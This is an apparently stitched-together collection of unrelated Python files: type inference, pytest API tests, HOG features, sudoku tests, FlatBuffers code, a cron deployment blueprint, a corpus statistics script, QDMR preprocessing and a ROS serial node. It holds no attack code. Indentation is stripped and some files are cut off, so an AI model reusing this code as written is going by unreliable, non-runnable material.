if isinstance(arg, ast.Variable):
return self.var_types.get(arg.full_id(), top)
real = table if id is None else GroundHead(table, id)
return UFGround(i, real, None)
def head_atom_ground(rule):
return not any(
isinstance(arg, ast.Variable) for arg in rule.head.args)
return {
table: [
reduce_disj(set(tlist))
for tlist in zip(*(
[type_arg_at(arg, table, i, id)
for i, arg in enumerate(rule.head.args)]
for rule in group_rule
for id in (None if head_atom_ground(rule) else rule.id,)
))]
for table, group_rule in itertools.groupby(self.rules,
key=head_table)}
def type(self):
"""Type a set of rules.
:returns: a dictionary from variable names to their type.
Performs a fixpoint. Each iteration type variables then type rule
heads. Table types are comparable and the fixpoint is achieved when
table types do not evolve.
It is the type structure that guarantees convergence.
"""
self.initialize_types()
while True:
self.type_variables()
new_table_types = self.type_tables()
if (new_table_types == self.table_types):
break
self.table_types = new_table_types
return self.var_types
|
from moto import mock_sts
import pytest
from ..apiMan import ApiMan
from isitfit.cli.click_descendents import IsitfitCliError
@pytest.fixture(scope='function')
def MockRequestsRequest(mocker):
def get_class(response):
# set up
def mockreturn(*args, **kwargs):
return response
mocker.patch('requests.request', side_effect=mockreturn)
am = ApiMan(tryAgainIn=2, ctx=None)
return am
return get_class
class TestApiManRequest:
@mock_sts
def test_register_failSchemaL1(self, mocker, MockRequestsRequest):
# since the MockApiManRequest patches the request function
# and since the request function is
response_val = {}
class MockResponse:
import json
text = json.dumps(response_val)
am = MockRequestsRequest(MockResponse)
# trigger
with pytest.raises(IsitfitCliError) as e:
am.register()
@mock_sts
def test_register_failErrorGeneral(self, mocker, MockRequestsRequest):
response_val = {'isitfitapi_status': {'code': 'error'}}
class MockResponse:
import json
text = json.dumps(response_val)
am = MockRequestsRequest(MockResponse)
# trigger
with pytest.raises(IsitfitCliError) as e:
am.register()
#---------------------------
@pytest.fixture(scope='function')
def MockApiManRequest(mocker):
def get_class(response):
# set up
def mockreturn(*args, **kwargs):
return response, None
mocker.patch('isitfit.apiMan.ApiMan.request', side_effect=mockreturn)
am = ApiMan(tryAgainIn=2, ctx=None)
return am
return get_class
class TestApiManRegister:
@mock_sts
def test_register_failRegInProg(self, mocker, MockApiManRequest):
response = {
'isitfitapi_status': {'code': 'Registration in progress', 'description': 'foo'},
'isitfitapi_body': {}
}
am = MockApiManRequest(response)
am.nsecs_wait = 0
# no exception, will not automatically try again
am.call_n = 0
am.tryAgainIn = 10
am.register()
# still no exception, will automatically try again till failing
am.call_n = 1
am.tryAgainIn = 2
am.n_maxCalls = 5
with pytest.raises(IsitfitCliError) as e:
am.register()
# triggers exception right away
am.call_n = 2
am.tryAgainIn = 2
am.n_maxCalls = 3
with pytest.raises(IsitfitCliError) as e:
am.register()
@mock_sts
def test_register_failSchemaL2(self, mocker, MockApiManRequest):
response = {
'isitfitapi_status': {'code': 'ok', 'description': 'foo'},
'isitfitapi_body': {
}
}
am = MockApiManRequest(response)
# exception
with pytest.raises(IsitfitCliError) as e:
am.register()
@mock_sts
def test_register_ok(self, mocker, MockApiManRequest):
response = {
'isitfitapi_status': {'code': 'ok', 'description': 'foo'},
'isitfitapi_body': {
's3_arn': 'foo',
'sqs_url': 'foo',
'role_arn': '01234567890123456789',
's3_bucketName': 'foo',
's3_keyPrefix': 'foo',
}
}
am = MockApiManRequest(response)
# no exception
am.register()
assert True
|
from django.contrib.auth.models import (User,Group)
for attr,name in (("FMSB","Fire Management Services Branch"),):
try:
setattr(Group,attr,Group.objects.get(name=name))
finally:
setattr(Group,attr,None)
|
from typing import List
import cv2
import numpy as np
def compute_features(hog_descriptor: cv2.HOGDescriptor, imgs: List[np.ndarray]) -> List[np.ndarray]:
"""
Compute HOG features for a list of images.
Parameters
----------
hog_descriptor : cv2.HOGDescriptor
The HOG descriptor to use for computing features.
imgs : List[np.ndarray]
List of images to compute features for.
Returns
-------
features : List[np.ndarray]
List of HOG features vector for each image.
"""
features = []
for img in imgs:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = cv2.resize(img, (64, 64))
f = hog_descriptor.compute(img)
features.append(f)
return features
|
#!/usr/bin/python3
import unittest
from context import *
from helpers import *
class TestBoard(unittest.TestCase):
def assertCell(self, values, actual):
expected = valuesFromDisplay( values )
self.assertEqual(expected, actual)
def test_reduceCell(self):
setup = Board(parseCells(readFixture('2007-02-18.sdk')))
self.assertEqual(5, setup.reduceCell(0))
self.assertCell([1, 3, 8, 9, ], setup._cells[0] )
def test_reduceRegion(self):
setup = Board(parseCells(readFixture('2007-02-18.sdk')))
# After reducing all the cells, there are three
# regions that can be reduced
for c in range(len(setup._cells)): setup.reduceCell(c)
self.assertEqual(1, setup.reduceRegion(iRows[7]))
self.assertEqual(1, setup.reduceRegion(iCols[2]))
self.assertEqual(2, setup.reduceRegion(iBoxes[6]))
self.assertCell([3,], setup._cells[8] )
def test_reduce(self):
setup = Board(parseCells(readFixture('2007-02-18.sdk')))
setup.reduce()
# This board has a branch point in cell 5
self.assertEqual(5, setup._shortest)
self.assertEqual([0, 1, ], setup._cells[setup._shortest])
if __name__ == '__main__':
unittest.main()
|
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: Example
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class StructOfStructs(object):
__slots__ = ['_tab']
@classmethod
def SizeOf(cls):
return 20
# StructOfStructs
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# StructOfStructs
def A(self, obj):
obj.Init(self._tab.Bytes, self._tab.Pos + 0)
return obj
# StructOfStructs
def B(self, obj):
obj.Init(self._tab.Bytes, self._tab.Pos + 8)
return obj
# StructOfStructs
def C(self, obj):
obj.Init(self._tab.Bytes, self._tab.Pos + 12)
return obj
def CreateStructOfStructs(builder, a_id, a_distance, b_a, b_b, c_id, c_distance):
builder.Prep(4, 20)
builder.Prep(4, 8)
builder.PrependUint32(c_distance)
builder.PrependUint32(c_id)
builder.Prep(2, 4)
builder.Pad(1)
builder.PrependInt8(b_b)
builder.PrependInt16(b_a)
builder.Prep(4, 8)
builder.PrependUint32(a_distance)
builder.PrependUint32(a_id)
return builder.Offset()
import MyGame.Example.Ability
import MyGame.Example.Test
try:
from typing import Optional
except:
pass
class StructOfStructsT(object):
# StructOfStructsT
def __init__(self):
self.a = None # type: Optional[MyGame.Example.Ability.AbilityT]
self.b = None # type: Optional[MyGame.Example.Test.TestT]
self.c = None # type: Optional[MyGame.Example.Ability.AbilityT]
@classmethod
def InitFromBuf(cls, buf, pos):
structOfStructs = StructOfStructs()
structOfStructs.Init(buf, pos)
return cls.InitFromObj(structOfStructs)
@classmethod
def InitFromObj(cls, structOfStructs):
x = StructOfStructsT()
x._UnPack(structOfStructs)
return x
# StructOfStructsT
def _UnPack(self, structOfStructs):
if structOfStructs is None:
return
if structOfStructs.A(MyGame.Example.Ability.Ability()) is not None:
self.a = MyGame.Example.Ability.AbilityT.InitFromObj(structOfStructs.A(MyGame.Example.Ability.Ability()))
if structOfStructs.B(MyGame.Example.Test.Test()) is not None:
self.b = MyGame.Example.Test.TestT.InitFromObj(structOfStructs.B(MyGame.Example.Test.Test()))
if structOfStructs.C(MyGame.Example.Ability.Ability()) is not None:
self.c = MyGame.Example.Ability.AbilityT.InitFromObj(structOfStructs.C(MyGame.Example.Ability.Ability()))
# StructOfStructsT
def Pack(self, builder):
return CreateStructOfStructs(builder, self.a.id, self.a.distance, self.b.a, self.b.b, self.c.id, self.c.distance)
|
"""
Cron Blueprint
==============
This blueprint has no settings.
Templates are handled as crontabs and should be named after related user.
**Fabric environment:**
.. code-block:: yaml
blueprints:
- blues.cron
"""
import os
from fabric.decorators import task
from refabric.context_managers import sudo, silent
from refabric.contrib import blueprints
from refabric.operations import run
from refabric.utils import info
from blues.application.providers.base import get_project_info
from blues import debian
__all__ = ['configure']
blueprint = blueprints.get(__name__)
@task
def configure():
"""
Install crontab per template (i.e. user)
"""
with sudo(), silent():
with debian.temporary_dir(mode=555) as temp_dir:
updates = blueprint.upload('./', temp_dir,
context=get_project_info())
for update in updates:
user = os.path.basename(update)
info('Installing new crontab for {}...', user)
run('crontab -u {} {}'.format(user, os.path.join(temp_dir, user)))
|
all_apis = []
|
"""
P(response|context cluster presence) for a given sample, based on sample
majority vote scores.
"""
import json
import os
import re
import typing
from collections import Counter, defaultdict
import pandas as pd
from scipy.stats import binom_test
def main():
# ------
# cluster of interest: to be iterated over and determine significance
# = {'label'|str|:(hash_level|int| : set of context tokens|list|}
# ! ENSURE A TOKENS ARE UNIQUE TO LABELS
# ------
sav_suffix = "health_14_341652"
clusters_of_interest = {'health_14_341652':(8, set(["joden", "niet-christen", "profeet", "romein", "christen", "evangelie", "christus", "dienaar", "gods", "sect", "god", "ood", "huwen", "allah", "voorvader", "bedienaar", "heilig", "boeddhistisch", "roemrijk", "woord", "heere", "bidden", "heilige", "geloofsgenoot", "troost", "geloofs", "medebroeder", "herder", "bewonderaar", "vaderlandsch", "geslacht", "goddelijk", "jezus", "adelijk", "brochure", "zegen", "gesneuvelde", "profetie", "nakomeling", "avontuurlijk", "heiligheid", "zalig", "godheid", "apostel", "genesis", "joodsch", "kruises", "confessie", "legende", "offerande", "afkomst", "kruise", "heerlijkheid", "gode", "belijden", "edele", "mythe", "kindor", "martelaar", "geloovlg", "heiden", "iong", "zegenen", "bekeering", "voorzienigheid", "secte", "zaligheid", "levenslicht", "belijdenis", "roemvol", "gevallene", "babel", "rechterstoel", "zondaar", "jongo", "almachtig", "voorouder", "zionisme", "triomf", "bijbelverhaal", "jesus", "gebod", "romeinen", "calvijn", "eerbiedig", "berinnering", "stervende", "bladzijde", "exodus", "valkenjacht", "weldoenster", "avontuur", "ziekbed", "belijder", "smeeken", "buddha", "bedroefd", "beminnen", "loovig", "andersdenkend", "geliefd", "salomo", "joodsche", "viouw", "godsrijk", "hemelschen", "missieland", "nageslacht", "allerhoogste", "roemruchtig", "legendarisch", "toovenaar", "heiligen", "grondvester", "marteldood", "fabel", "afkorten", "triomfantelijk", "stervensuur", "weldoener", "geloofsbelijdenis", "pupil", "juffer", "engel", "nakomelingschap", "apostelen", "bidd", "overlevering", "nari", "zion", "rabbi", "heiland", "baby", "gelovig", "rouwen", "zegening", "heidenen", "triomfator", "oods", "voorgeslacht", "heks", "farao", "zielenheil", "wederkomst", "verlosser", "goden", "grafschrift", "lauwer", "thora", "joods", "vereering", "troostwoord", "discipel", "sinai", 'gezegenden', 'onsterfelijk', 'heidenwereld', 'ontroerd', 'draak', 'christen-', 'wijsgeerig', 'openbaring', 'verlossing', 'godin', 'glorie', 'eeuwigheid', 'mythologisch', 'satan', 'religieus', 'hemelsch', 'schepper', 'duivel', 'koran', 'vroom', 'opperwezen', 'vrijkopen', 'godsdienstig']))}
# convert to hash of {'token':'label', }
h = {token:label for label, (hash_level, s) in clusters_of_interest.items() for token in s}
# ------
# load data
# ------
with open("../data.csv", "r") as f:
data = pd.read_csv(f)
# remove all 'weet ik niet' and 'Onleesbare ...'
data = data[
data["response"].isin(["Omstreden naar huidige maatstaven", "Niet omstreden"])
]
# case fold target_compound
data["target_compound"] = data["target_compound"].str.lower()
# get a series of text-analysed contexts by extract_id
contexts: pd.Series = data.groupby(["extract_id"]).first().loc[:, "text_analysed"]
# ------
# load dataframe of | extract_id | label |
# ------
with open("../majority_vote/majority_vote.csv", "r") as f:
majority_vote = pd.read_csv(f)
majority_vote = majority_vote.set_index("extract_id")
# ------
# Construct extract id associations with cluster, and cluster's respective tokens
# ------
extracts_by_cluster = defaultdict(set) # cluster_label|str| : set of extract ids present|list|
flagged_contexts_by_cluster = defaultdict(Counter) # cluster_label|str| : Counter({context_tokens: count of unique extract appears in})
for extract_id, text in contexts.iteritems():
# iterate over context tokens
seen_terms = set()
for context_token in set(
[
t
for s in text.split("<sent>")
for t in s.split(" ")
if t != "" and t != " "
]
):
# add unseen terms (wrt., current extract) present in hashes to ...
if context_token in h and context_token not in seen_terms:
seen_terms.add(context_token)
cluster_label = h[context_token]
extracts_by_cluster[cluster_label].add(extract_id) # each extract only associated once with an extract regardless of frequency
# how many extracts a clusters' context tokens appears
flagged_contexts_by_cluster[cluster_label][context_token] += 1
# build target_words_by_context_cluster = {cluster_label|str|: associated target words|list|}
target_words_by_id = (
data.groupby(["extract_id"]).first().loc[:, "target_compound"]
)
target_words_by_context_cluster = defaultdict(Counter)
for cluster_label, extract_ids in extracts_by_cluster.items():
for extract_id in extract_ids:
target = target_words_by_id.at[extract_id]
target_words_by_context_cluster[cluster_label][target] += 1
# ------
# build df of statistics wrt., selected clusters
# ------
stats = defaultdict(list)
for cluster_label, extract_ids in extracts_by_cluster.items():
votes = [
majority_vote.at[extract_id, "label"] for extract_id in extract_ids
] # votes associated with all context clusters
stats["cluster"].append(cluster_label)
stats["num_corresponding_extracts"].append(len(votes))
count_c = sum([1 for v in votes if v == 1])
count_n = sum([1 for v in votes if v == 0])
count_u = sum([1 for v in votes if v == 0.5])
count = len(votes)
# attribute point estimates and p-values
stats["proportion_with_contentious"].append((count_c) / (count))
stats["contentious_p_value"].append(
binom_test(count_c, count, p=0.183, alternative="greater")
)
stats["proportion_with_non_contentious"].append((count_n) / (count))
stats["non_contentious_p_value"].append(
binom_test(count_n, count, p=0.796, alternative="greater")
)
stats["proportion_with_no_majority"].append((count_u) / (count))
# attibute number of target words and number of instances
targets = target_words_by_context_cluster[cluster_label]
target_string = ", ".join(
[t + f"({count})" for t, count in targets.items()]
)
stats["targets_count"].append(sum([1 for t, c in targets.items()]))
stats["targets"].append(target_string)
# attibute distribution of context words
stats["context_tokens_occuring"].append(
", ".join(
[str(c) for c in flagged_contexts_by_cluster[cluster_label].items()]
)
)
# context words - for cut and paste translate
stats["context_tokens_occuring2"].append(
", ".join([i for i, j in flagged_contexts_by_cluster[cluster_label].items()])
)
# save as a dataframe
stats = pd.DataFrame.from_dict(stats)
sav = f"selected/stats_{sav_suffix}.csv"
os.makedirs(os.path.dirname(sav), exist_ok=True)
with open(sav, "w") as f:
stats.to_csv(f)
def gen_dir(dir: str = os.getcwd(), *, pattern: str = ".+") -> typing.Generator:
"""Return a generator of absolute paths of file in a directory, optionally matching a pattern.
Args:
dir (str): [default: script dir]
pattern (str): filename pattern to match against [default: any file]
"""
for filename in os.listdir(dir):
if re.search(pattern, filename):
yield filename
else:
continue
if __name__ == "__main__":
main()
|
from models.flow.glow.glow import Glow
|
from .menu_item import MenuItemAdmin # noqa
|
__path__ = __import__('pkgutil').extend_path(__path__, __name__)
from spdm.common.SpObject import SpObject
SpObject.association.update({
".data.file.table": ".data.file.PluginTable",
".data.file.bin": ".data.file.PluginBinary",
".data.file.h5": ".data.file.PluginHDF5",
".data.file.hdf5": ".data.file.PluginHDF5",
".data.file.nc": ".data.file.PluginNetCDF",
".data.file.netcdf": ".data.file.PluginNetCDF",
".data.file.namelist": ".data.file.PluginNamelist",
".data.file.nml": ".data.file.PluginNamelist",
".data.file.xml": ".data.file.PluginXML",
".data.file.json": ".data.file.PluginJSON",
".data.file.yaml": ".data.file.PluginYAML",
".data.file.txt": ".data.file.PluginTXT",
".data.file.csv": ".data.file.PluginCSV",
".data.file.numpy": ".data.file.PluginNumPy",
".data.file.gfile": ".data.file.PluginGEQdsk",
".data.file.geqdsk": ".data.file.PluginGEQdsk",
".data.file.mds": ".data.db.PluginMDSplus#MDSplusFile",
".data.file.mdsplus": ".data.db.PluginMDSplus#MDSplusFile",
# ".data.file.mds": ".data.db.MDSplus#MDSplusDocument",
# ".data.file.mdsplus": ".data.db.MDSplus#MDSplusDocument",
# ".data.file.gfile": ".data.file.PluginGEQdsk",
# ".data.file.geqdsk": ".data.file.PluginGEQdsk",
# "db.imas":".spdm.plugins.data.db.IMAS#IMASDocument",
})
|
"""Rule-based preprocessing of Break QDMR's and determining their operation types."""
import sys
import argparse
import collections
import logging
import math
import os
import random
import six
from tqdm import tqdm, trange
import ujson as json
import time, pickle, re, jsonlines
from copy import deepcopy
from functools import partial
from collections import Counter
import numpy as np
import pandas as pd
from utils import read_file, write_file, get_ent, dirname
from break_utils import compare
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
DELIMITER = ';'
REF = '#'
FLTR_STR = '@@@FILTER_WITH@@@'
# ---------- rule-based identification of the qdmr ops given the decomposition steps -----------
class QDMROperation:
FIND, SELECT, FILTER, PROJECT, AGGREGATE, GROUP, SUPERLATIVE, COMPARATIVE, UNION, \
INTERSECTION, DISCARD, SORT, BOOLEAN, ARITHMETIC, COMPARISON, NONE = range(16)
def op_name(qdmr_op):
return {
QDMROperation.FIND : 'FIND',
QDMROperation.SELECT : 'SELECT',
QDMROperation.FILTER : 'FILTER',
QDMROperation.PROJECT : 'PROJECT',
QDMROperation.AGGREGATE : 'AGGREGATE',
QDMROperation.GROUP : 'GROUP',
QDMROperation.SUPERLATIVE : 'SUPERLATIVE',
QDMROperation.COMPARATIVE : 'COMPARATIVE',
QDMROperation.UNION : 'UNION',
QDMROperation.INTERSECTION : 'INTERSECTION',
QDMROperation.DISCARD : 'DISCARD',
QDMROperation.SORT : 'SORT',
QDMROperation.BOOLEAN : 'BOOLEAN',
QDMROperation.ARITHMETIC : 'ARITHMETIC',
QDMROperation.COMPARISON : 'COMPARISON',
QDMROperation.NONE : 'NONE'
}.get(qdmr_op, QDMROperation.NONE)
def step_type(step, is_high_level):
"""
Maps a single QDMR step into relevant its operator type
Parameters
----------
step : str
String representation a single QDMR step
is_high_level : bool
Flag whether or not we include the high level FIND steps,
associated with RC datasets
Returns
-------
QDMROperation
returns the type of QDMR operation of the step
"""
step = step.lower()
references = extract_references(step)
if any([step.lower().startswith(x) for x in ['if ', 'is ', 'are ']]):
# BOOLEAN step - starts with either 'if', 'is', 'are'
return QDMROperation.BOOLEAN
if len(references) == 0:
# SELECT step - no references to previous steps
return QDMROperation.SELECT
# Discrete QDMR step types:
if len(references) == 1:
# AGGREGATION step - aggregation applied to one reference
aggregators = ['number of', 'highest', 'largest', 'lowest', 'smallest', 'maximum', 'minimum', \
'max', 'min', 'sum', 'total', 'average', 'avg', 'mean ']
for aggr in aggregators:
aggr_ref = aggr + ' #'
aggr_of_ref = aggr + ' of #'
if (aggr_ref in step) or (aggr_of_ref in step):
return QDMROperation.AGGREGATE
if 'for each' in step:
# GROUP step - contains term 'for each'
return QDMROperation.GROUP
if len(references) >= 2 and len(references) <= 3 and ('where' in step):
# COMPARATIVE step - '#1 where #2 is at most three'
comparatives = ['same as', 'higher than', 'larger than', 'smaller than', 'lower than',\
'more', 'less', 'at least', 'at most', 'equal', 'is', 'are', 'was', 'contain', \
'include', 'has', 'have', 'end with', 'start with', 'ends with', \
'starts with', 'begin']
for comp in comparatives:
if comp in step:
return QDMROperation.COMPARATIVE
if step.startswith('#') and ('where' in step) and len(references) == 2:
# SUPERLATIVE step - '#1 where #2 is highest/lowest'
superlatives = ['highest', 'largest', 'most', 'smallest', 'lowest', 'smallest', 'least', \
'longest', 'shortest', 'biggest']
for s in superlatives:
if s in step:
return QDMROperation.SUPERLATIVE
if len(references) > 1:
# UNION step - '#1, #2, #3, #4' / '#1 or #2' / '#1 and #2'
is_union = re.search("^[#\s]+[and0-9#or,\s]+$", step)
if is_union:
return QDMROperation.UNION
if len(references) > 1 and ('both' in step) and ('and' in step):
# INTERSECTION step - 'both #1 and #2'
return QDMROperation.INTERSECTION
if (len(references) >= 1) and (len(references) <= 2) and \
(re.search("^[#]+[0-9]+[\s]+", step) or re.search("[#]+[0-9]+$", step)) and \
('besides' in step or 'not in' in step):
# DISCARD step - '#2 besides X'
return QDMROperation.DISCARD
if ('sorted by' in step) or ('order by' in step) or ('ordered by' in step):
# SORT step - '#1 ordered/sorted by #2'
return QDMROperation.SORT
if step.lower().startswith('which') and len(references) > 1:
# COMPARISON step - 'which is better A or B or C'
return QDMROperation.COMPARISON
if len(references) >= 1 and ('and' in step or ',' in step):
# ARITHMETIC step - starts with arithmetic operation
arithmetics = ['sum', 'difference', 'multiplication', 'division']
for a in arithmetics:
if step.startswith(a) or step.startswith('the ' + a):
return QDMROperation.ARITHMETIC
# Non-discrete QDMR step types:
if len(references) == 1 and re.search("[\s]+[#]+[0-9\s]+", step):
# PROJECT step - 'property of #2'
return QDMROperation.PROJECT
if len(references) == 1 and step.startswith("#"):
# FILTER step - '#2 [condition]'
return QDMROperation.FILTER
if len(references) > 1 and step.startswith("#"):
# FILTER step - '#2 [relation] #3'
return QDMROperation.FILTER
if is_high_level:
return QDMROperation.FIND
return QDMROperation.NONE
def extract_references(step):
"""Extracts list of references to previous steps
Parameters
----------
step : str
String representation of a QDMR step
Returns
-------
list
returns list of ints of referenced steps
"""
# make sure decomposition does not contain a mere '# ' rather than reference.
step = step.replace("# ", "hashtag ")
# replace ',' with ' or'
step = step.replace(", ", " or ")
references = []
l = step.split(REF)
for chunk in l[1:]:
if len(chunk) > 1:
ref = chunk.split()[0]
ref = int(ref)
references += [ref]
if len(chunk) == 1:
ref = int(chunk)
references += [ref]
return references
# ------- preparing the QDMRs based on identified ops -------------
class QDMR:
def __init__(self, question_id, steps, op_types=None):
'''Further processing FILTER steps for convenience during downstream tasks.
'''
op_types = op_types if op_types else [get_op_type(step) for step in steps]
assert len(steps) == len(op_types) and len(steps)
_steps, _op_types = [], []
for i_s, (step, op) in enumerate(zip(steps, op_types)):
if FLTR_STR in step:
# append the index of the step wrt which the filter step is applied
if step.count(FLTR_STR) > 1: # hack for rule-based
# removing the starting FILTER string
step = step[len(FLTR_STR):].strip()
assert step.count(FLTR_STR) == 1, print(step)
# --------------
# if op != 'FILTER':
# print(f'{i_s} : "{step}" : changing identified op {op} --> FILTER')
# op = 'FILTER'
# ----------------
assert op == 'FILTER', print(op_types, op, step, '\n***********')
idx = step.index(FLTR_STR)
# extract the filter string with the operand step idx
ph = step[idx + len(FLTR_STR):].strip()
assert ph in [f'#{n}' for n in range(1,7)], print(step, ph)
assert int(ph[1:]) <= i_s, print(steps, op_types, ph)
_steps.append(step[:idx].strip())
_op_types.append(op+str(f'_{ph}'))
else:
_steps.append(step)
_op_types.append(op)
self.question_id = question_id
self.steps = _steps
self.op_types = _op_types
def parse_decomposition(qdmr):
"""Parses the decomposition into an ordered list of steps
Parameters
----------
qdmr : str
String representation of the QDMR
Returns
-------
list
returns ordered list of qdmr steps
"""
crude_steps = qdmr.split(DELIMITER)
steps = []
for step in crude_steps:
tokens = step.strip().split()
# remove 'return' prefix
step = ' '.join([tok.strip() for tok in tokens[1:] if tok.strip()])
steps.append(step)
return steps
def prepare_decompositions(csv_path):
"""Reads file of QDMR strings into list of decompositions
Parameters
----------
file_path : str
Path to the decomposition file
Returns
-------
list
Returns list of QDMR objects
"""
rows = pd.read_csv(csv_path, encoding='utf8').to_dict(orient='records')
qdmrs = []
for i, r in enumerate(rows):
given_steps = [x.strip() for x in r['steps'].strip().split(DELIMITER)]
given_types = [x.strip() for x in r['operators'].strip().split(DELIMITER)]
qdmr = QDMR(r['id'], given_steps, given_types)
qdmrs.append(qdmr)
return qdmrs
def get_op_type(step):
op = step_type(step, True)
if op == QDMROperation.FIND or \
op == QDMROperation.PROJECT:
return "BRIDGE"
if op == QDMROperation.BOOLEAN:
refs = extract_references(step)
if len(refs) == 2:
if (' both ' in step) and (' and ' in step):
return '%s_AND' % op_name(op)
if (' either ' in step) and (' or ' in step):
return '%s_OR' % op_name(op)
if (' same as ' in step):
return '%s_EQ' % op_name(op)
if (' different ' in step):
return '%s_NEQ' % op_name(op)
return op_name(op)
else:
return op_name(op)
return False
def print_op_stats(qdmr_list):
has_op_counter = Counter()
all_ops_counter = Counter()
for qdmr in qdmr_list:
has_op_counter.update(set(qdmr.op_types))
all_ops_counter.update({str(qdmr.op_types)})
print(f"Num of QDMRs: {len(qdmr_list)}")
for op, cnt in has_op_counter.most_common():
print(f"containing a {op} step: {cnt} , {round(cnt / len(qdmr_list) * 100, 2)}%")
print("*"*50)
print('Most common op-sequences with a FILTER:')
for key, count in all_ops_counter.most_common():
if 'FILTER' in key:
print(key, '%.2f%%' % (count*100/len(qdmr_list)))
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--processed_break_csv", default='data/qdmr_data/processed_data_hotpotqa_gold.csv',
type=str, help="path to the processed .csv of the break experiment (gold/predicted/rule-based).")
parser.add_argument("--out_jsonl", default='qdmrs_hotpot_gold.jsonl',
type=str, help="the processed break .jsonl to be saved in same dir as input break file.")
args = parser.parse_args()
break_csv = args.processed_break_csv
# process the QDMRs
logging.info(f'processing {break_csv} ...')
qdmrs = prepare_decompositions(break_csv)
# operator statistics
print_op_stats(qdmrs)
outfile = f'{dirname(break_csv)}/{args.out_jsonl}'
logging.info(f'saving the processed QDMRs to {outfile}')
write_file([qdmr.__dict__ for qdmr in qdmrs], outfile)
if __name__ == "__main__":
main()
'''
python prepare_break.py --processed_break_csv data/qdmr_data/processed_data_hotpotqa_gold.csv --out_jsonl qdmrs_hotpotqa_gold.jsonl
python prepare_break.py --processed_break_csv data/qdmr_data/processed_data_hotpotqa_copy_net.csv --out_jsonl qdmrs_hotpotqa_copy_net.jsonl
python prepare_break.py --processed_break_csv data/qdmr_data/processed_data_hotpotqa_rule_based.csv --out_jsonl qdmrs_hotpotqa_rule_based.jsonl
'''
|
#!/usr/bin/python
# NOTE: on Ubuntu 18.04, specifying /usr/bin/env python uses python 3,
# while specifying /usr/bin/python uses python 2.7. We need 2.7.
# serial_tx_fromtopic writes messages from a topic to the serial port.
# Usage is:
# rosrun spine_controller serial_tx_fromtopic device-name topic-name
# Right now, this subscriber node only works for messages of type Float32MultiArray,
# since that's what's used in the invkin_tx_totopic node.
# We're also doing a publisher here, so we can confirm what's echoed out to the serial.
# Imports:
import rospy
# because we need the command-line arguments
import sys
# and for the serial/usb/uart via pyserial:
import serial
# need to manipulate arrays
import numpy as np
# We'll also be echoing messages to a ros topic.
# There's a nice message spec: numpy_msg
from rospy.numpy_msg import numpy_msg
# but that needs to wrap around a standard message type.
# Seems that arrays are in the *MultiArray messages.
# We don't need 64 bits because the invkin output is only to a few decimal places
#from std_msgs.msg import Float32MultiArray
# Now we've got our own message type.
from spine_controller.msg import InvkinControlCommand
# also need to echo back a string of the formatted output to the serial port.
from std_msgs.msg import String
# Note: in order to do publishing within a callback, we need to pass around
# the publisher object, which is done much easier by making this a class.
class SerialTxFromTopic:
# The callback function here does all the heavy lifting.
def serial_tx_callback(self, message):
# When a message is received:
# 1) format the string to send to the PSoC
# 2) actually send the message
# 3) publish the formatted string back out to another debugging topic
# The ndarray is in
#invkin_command = np.array(message.data)
# Let's do a string with the following format, which seems to work OK on the PSoC:
# u (rl1) (rl2) ... (rln)
# For example,
# u 0.02 0.476 0.87 0.05
# The PSoC will then parse the first character as a command (u = this is a control input)
# and then the remaining numbers with spaces between them.
# Now using our own message type:
invkin_command = np.array(message.invkin_control)
# A discussion on the length of the string:
# It may be bad to do more than a 32-character message over UART, that's pretty long.
# So if we've got 4 cables with 4 colons and a "u", that leaves (32 - 5)/4 = 6 characters per
# control input. That's 4 digits after the decimal (since we'll never have more than a 1 meter command.)
# As of 2018-11-29, the PSoC code has a 128-bit receive buffer for UART strings.
# That means we can do much longer strings. Arbitrarily, choose 6 decimal places.
# Check: something something single-precision floating point??
# (again recalling that our invkin outputs are in meters, which will never be greater than 1,
# so the floats will always be 0.something.)
# We seem to be getting some mis-aligned commands.
# So, before anything else, send out a "clear" every time.
self.serial_port.write("\n")
# give the PSoC a moment
# maybe 20 ms?
rospy.sleep(0.02)
self.serial_port.write("c\n")
rospy.sleep(0.02)
self.serial_port.write("c\n")
rospy.sleep(0.02)
# Thanks to our friends on stackoverflow (https://stackoverflow.com/questions/21008858/formatting-floats-in-a-numpy-array),
# a nice way to format w/ only certain precision is
def ik_cmd_formatter(x): return "%.8f" % x
# The result string will be
cmd_string = "u"
# and we can concatenate each float to it.
for i in range(invkin_command.shape[-1]):
# Add to the command string, with a preceeding space
cmd_string += " " + str(ik_cmd_formatter(invkin_command[i]))
# tack on a newline, since the PSoC requires that.
cmd_string += "\n"
# Send the message
self.serial_port.write(cmd_string)
# And echo back.
self.pub.publish(cmd_string)
# The primary helper function here opens the serial device,
# subscribes to a topic, writes when new data appears on the topic, and
# echoes (publishes) its pushed data back out on *another* topic for debugging.
def serial_tx_startup(self, device_name):
# A welcome message
# Hard-coding the topic name, doesn't make sense to need to pass it in each time.
topic_name = 'invkin_tx_commands'
print("Running serial_tx_fromtopic node with device " + device_name
+ " and topic " + topic_name)
#print(" and python version:")
# print(sys.version)
# Hard-code a timeout for pyserial. Seems recommended, even for tx?
serial_timeout = 1
# First, start up the ros node.
rospy.init_node('serial_tx_fromtopic', anonymous=False)
# The main functionality here is a subscriber.
#sub = rospy.Subscriber(topic_name, Float32MultiArray, self.serial_tx_callback)
sub = rospy.Subscriber(topic_name, InvkinControlCommand, self.serial_tx_callback)
# We'll publish commands to a topic just in case someone else wants to use them
pub = rospy.Publisher('serial_tx_echo', String, queue_size=10)
# Next, do the serial setup:
# Hard-coded: our PSoC uses the following baud rate:
psoc_baud = 115200
# create the serial port object
serial_port = serial.Serial(device_name, psoc_baud, timeout=serial_timeout)
# flush out any old data
serial_port.reset_input_buffer()
serial_port.reset_output_buffer()
# finishing setup.
print("Opened port, subscriber created. Now echoing from topic to serial.")
# and return the publisher so that the callback can use it.
# also needs to have the serial port available to the callback.
return serial_port, pub
# The constructor calls a helper to initialize everything, and stores the
# resulting publisher and serial port object that's created.
def __init__(self, device_name):
self.serial_port, self.pub = self.serial_tx_startup(device_name)
# and that's all.
# the main function: create one of these objects, while parsing the serial port path
# and topic name to subscribe to.
if __name__ == '__main__':
